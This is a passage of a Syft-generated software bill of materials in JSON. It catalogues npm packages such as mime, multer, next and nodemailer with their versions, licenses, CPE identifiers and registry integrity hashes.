*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/media-typer@0.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz","integrity":"sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==","dependencies":null}},{"id":"670d71ff9d8ed75e","name":"merge-descriptors","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/merge-descriptors@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz","integrity":"sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==","dependencies":null}},{"id":"49cc3c07a1505404","name":"merge2","version":"1.4.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:merge2:merge2:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/merge2@1.4.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz","integrity":"sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==","dependencies":null}},{"id":"a17abee1ae67ac79","name":"methods","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:methods:methods:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/methods@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/methods/-/methods-1.1.2.tgz","integrity":"sha512-iclAHeNqNm68zFtnZ0e+1L2yUIdvzNoauKU4WBA3VvH/vPFieF7qfRlwUZU+DA9P9bPXIS90ulxoUoCH23sV2w==","dependencies":null}},{"id":"dc31731ddf283ca7","name":"micromatch","version":"4.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:jonschlinkert:micromatch:4.0.8:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/micromatch@4.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz","integrity":"sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==","dependencies":{"braces":"^3.0.3","picomatch":"^2.3.1"}}},{"id":"10b23cab35239c6d","name":"mime","version":"1.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:mime_project:mime:1.6.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/mime@1.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/mime/-/mime-1.6.0.tgz","integrity":"sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==","dependencies":null}},{"id":"438a12c55a1c15bf","name":"mime","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:mime_project:mime:3.0.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/mime@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/mime/-/mime-3.0.0.tgz","integrity":"sha512-jSCU7/VB1loIWBZe14aEYHU/+1UMEHoaO7qxCOVJOw9GgH72VAWppxNcjU+x9a2k3GSIBXNKxXQFqRvvZ7vr3A==","dependencies":null}},{"id":"e010d1b3c9ab0c02","name":"mime-db","version":"1.52.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:mime-db:mime-db:1.52.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime-db:mime_db:1.52.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime_db:mime-db:1.52.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime_db:mime_db:1.52.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime:mime-db:1.52.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime:mime_db:1.52.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/mime-db@1.52.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz","integrity":"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==","dependencies":null}},{"id":"d035c2d2cba76761","name":"mime-types","version":"2.1.35","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:mime-types:mime-types:2.1.35:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime-types:mime_types:2.1.35:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime_types:mime-types:2.1.35:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime_types:mime_types:2.1.35:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime:mime-types:2.1.35:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:mime:mime_types:2.1.35:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/mime-types@2.1.35","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz","integrity":"sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==","dependencies":{"mime-db":"1.52.0"}}},{"id":"dadb042585b0fc99","name":"minimatch","version":"9.0.9","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/minimatch@9.0.9","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz","integrity":"sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==","dependencies":{"brace-expansion":"^2.0.2"}}},{"id":"bf8bc4c7577fa757","name":"minimist","version":"1.2.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/minimist@1.2.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz","integrity":"sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==","dependencies":null}},{"id":"a4e62963fcdf0651","name":"minipass","version":"7.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BlueOak-1.0.0","spdxExpression":"BlueOak-1.0.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/minipass@7.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz","integrity":"sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==","dependencies":null}},{"id":"4ee017b1ce1fca30","name":"mkdirp","version":"0.5.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/mkdirp@0.5.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz","integrity":"sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==","dependencies":{"minimist":"^1.2.6"}}},{"id":"0b0e2e978d7d93f4","name":"morgan","version":"1.10.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/morgan@1.10.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz","integrity":"sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A==","dependencies":{"basic-auth":"~2.0.1","debug":"2.6.9","depd":"~2.0.0","on-finished":"~2.3.0","on-headers":"~1.1.0"}}},{"id":"46f1aa86e531772d","name":"ms","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/ms@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ms/-/ms-2.0.0.tgz","integrity":"sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==","dependencies":null}},{"id":"bb1077662b3cb7e0","name":"ms","version":"2.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/ms@2.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ms/-/ms-2.1.3.tgz","integrity":"sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==","dependencies":null}},{"id":"775c553ab4f0a485","name":"multer","version":"1.4.5-lts.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/multer@1.4.5-lts.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz","integrity":"sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A==","dependencies":{"append-field":"^1.0.0","busboy":"^1.0.0","concat-stream":"^1.5.2","mkdirp":"^0.5.4","object-assign":"^4.1.1","type-is":"^1.6.4","xtend":"^4.0.0"}}},{"id":"96c78782a0a6a6e8","name":"mz","version":"2.7.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/mz@2.7.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/mz/-/mz-2.7.0.tgz","integrity":"sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q==","dependencies":{"any-promise":"^1.0.0","object-assign":"^4.0.1","thenify-all":"^1.0.0"}}},{"id":"fc2d97a12d1a4dda","name":"nanoid","version":"3.3.11","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/nanoid@3.3.11","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz","integrity":"sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==","dependencies":null}},{"id":"312bd96694b2eb5b","name":"negotiator","version":"0.6.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/negotiator@0.6.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz","integrity":"sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==","dependencies":null}},{"id":"a9792237818f8415","name":"next","version":"14.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/next@14.2.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/next/-/next-14.2.3.tgz","integrity":"sha512-dowFkFTR8v79NPJO4QsBUtxv0g9BrS/phluVpMAt2ku7H+cbcBJlopXjkWlwxrk/xGqMemr7JkGPGemPrLLX7A==","dependencies":{"@next/env":"14.2.3","@swc/helpers":"0.5.5","busboy":"1.6.0","caniuse-lite":"^1.0.30001579","graceful-fs":"^4.2.11","postcss":"8.4.31","styled-jsx":"5.1.1"}}},{"id":"5c4492e68f441264","name":"node-cron","version":"3.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:node-cron:node-cron:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node-cron:node_cron:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node_cron:node-cron:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node_cron:node_cron:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node:node-cron:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node:node_cron:3.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/node-cron@3.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/node-cron/-/node-cron-3.0.3.tgz","integrity":"sha512-dOal67//nohNgYWb+nWmg5dkFdIwDm8EpeGYMekPMrngV3637lqnX0lbUcCtgibHTz6SEz7DAIjKvKDFYCnO1A==","dependencies":{"uuid":"8.3.2"}}},{"id":"71294da0e67ef2a3","name":"node-fetch","version":"2.7.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:node-fetch_project:node-fetch:2.7.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/node-fetch@2.7.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz","integrity":"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==","dependencies":{"whatwg-url":"^5.0.0"}}},{"id":"c1e5f20287afef44","name":"node-forge","version":"1.4.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"(BSD-3-Clause OR GPL-2.0)","spdxExpression":"(BSD-3-Clause OR GPL-2.0)","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:digitalbazaar:forge:1.4.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/node-forge@1.4.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/node-forge/-/node-forge-1.4.0.tgz","integrity":"sha512-LarFH0+6VfriEhqMMcLX2F7SwSXeWwnEAJEsYm5QKWchiVYVvJyV9v7UDvUv+w5HO23ZpQTXDv/GxdDdMyOuoQ==","dependencies":null}},{"id":"157e4f935702d7be","name":"node-releases","version":"2.0.38","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:node-releases:node-releases:2.0.38:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node-releases:node_releases:2.0.38:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node_releases:node-releases:2.0.38:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node_releases:node_releases:2.0.38:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node:node-releases:2.0.38:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:node:node_releases:2.0.38:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/node-releases@2.0.38","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/node-releases/-/node-releases-2.0.38.tgz","integrity":"sha512-3qT/88Y3FbH/Kx4szpQQ4HzUbVrHPKTLVpVocKiLfoYvw9XSGOX2FmD2d6DrXbVYyAQTF2HeF6My8jmzx7/CRw==","dependencies":null}},{"id":"bdc7a63994d0b28a","name":"nodemailer","version":"6.10.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT-0","spdxExpression":"MIT-0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:nodemailer:nodemailer:6.10.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/nodemailer@6.10.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/nodemailer/-/nodemailer-6.10.1.tgz","integrity":"sha512-Z+iLaBGVaSjbIzQ4pX6XV41HrooLsQ10ZWPUehGmuantvzWoDVBnmsdUcOIDM1t+yPor5pDhVlDESgOMEGxhHA==","dependencies":null}},{"id":"47f001cd3ecd3ee8","name":"nopt","version":"7.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:nopt:nopt:7.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/nopt@7.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/nopt/-/nopt-7.2.1.tgz","integrity":"sha512-taM24ViiimT/XntxbPyJQzCG+p4EKOpgD3mxFwW38mGjVUrfERQOeY4EDHjdnptttfHuHQXFx+lTP08Q+mLa/w==","dependencies":{"abbrev":"^2.0.0"}}},{"id":"86c9c8fe4da1b72f","name":"normalize-path","version":"3.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:normalize-path:normalize-path:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize-path:normalize_path:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize_path:normalize-path:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize_path:normalize_path:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize:normalize-path:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:normalize:normalize_path:3.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/normalize-path@3.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz","integrity":"sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub051